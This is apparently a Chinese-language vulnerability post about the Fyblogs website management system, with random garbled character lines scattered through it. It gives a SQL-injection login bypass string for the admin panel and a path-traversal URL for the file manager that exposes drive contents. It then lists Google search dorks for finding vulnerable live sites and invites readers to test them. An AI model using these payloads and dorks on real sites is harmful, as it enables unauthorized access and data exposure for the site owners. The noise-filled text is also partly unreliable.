漏洞类型: 未授权访问/权限绕过
) F W T; w2 Z Q" e$ _ m! O( V8 a6 m
简要描述:
( d8 E1 _/ i" X3 V1 ~+ j) @% i/ h# r& e: Q5 o, K/ u
Fyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
& A+ L. \8 D' Z2 w7 h: s1 T k- S
) k# L9 L3 O# ?3 y4 L- K详细说明:
3 m! i! f J- I/ `- D$ A+ `8 N N
后台万能密码 'or'='or'' h- c8 f- N Y8 E6 t: p8 X
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
4 a6 e ^2 A) B+ a! K/ `. q+ W6 K( J: vadmin/uploadfile.asp?currentFolder=/upfiles/../8 K3 O5 \$ f& P/ `" `$ |6 j; W
% m) N4 W. s4 y! |, v( K: E漏洞证明:7 t2 {+ i6 ^' ^$ e* [
4 n5 V# i4 s- h- j7 y
谷歌:inurl:type.asp?id=1 新闻中心4 {6 u8 Y G& f2 O! Y/ K6 B
或者 :inurl:download_ok.asp?
+ E1 _" i! ~) S m) O& M7 w- _
8 O1 Q9 e8 t* d% h: L* \4 ^可以测试
& ]: W0 N3 N! m! R; A! h3 D. O* g6 _! _+ |: T
+ f! z- i ~ |- w |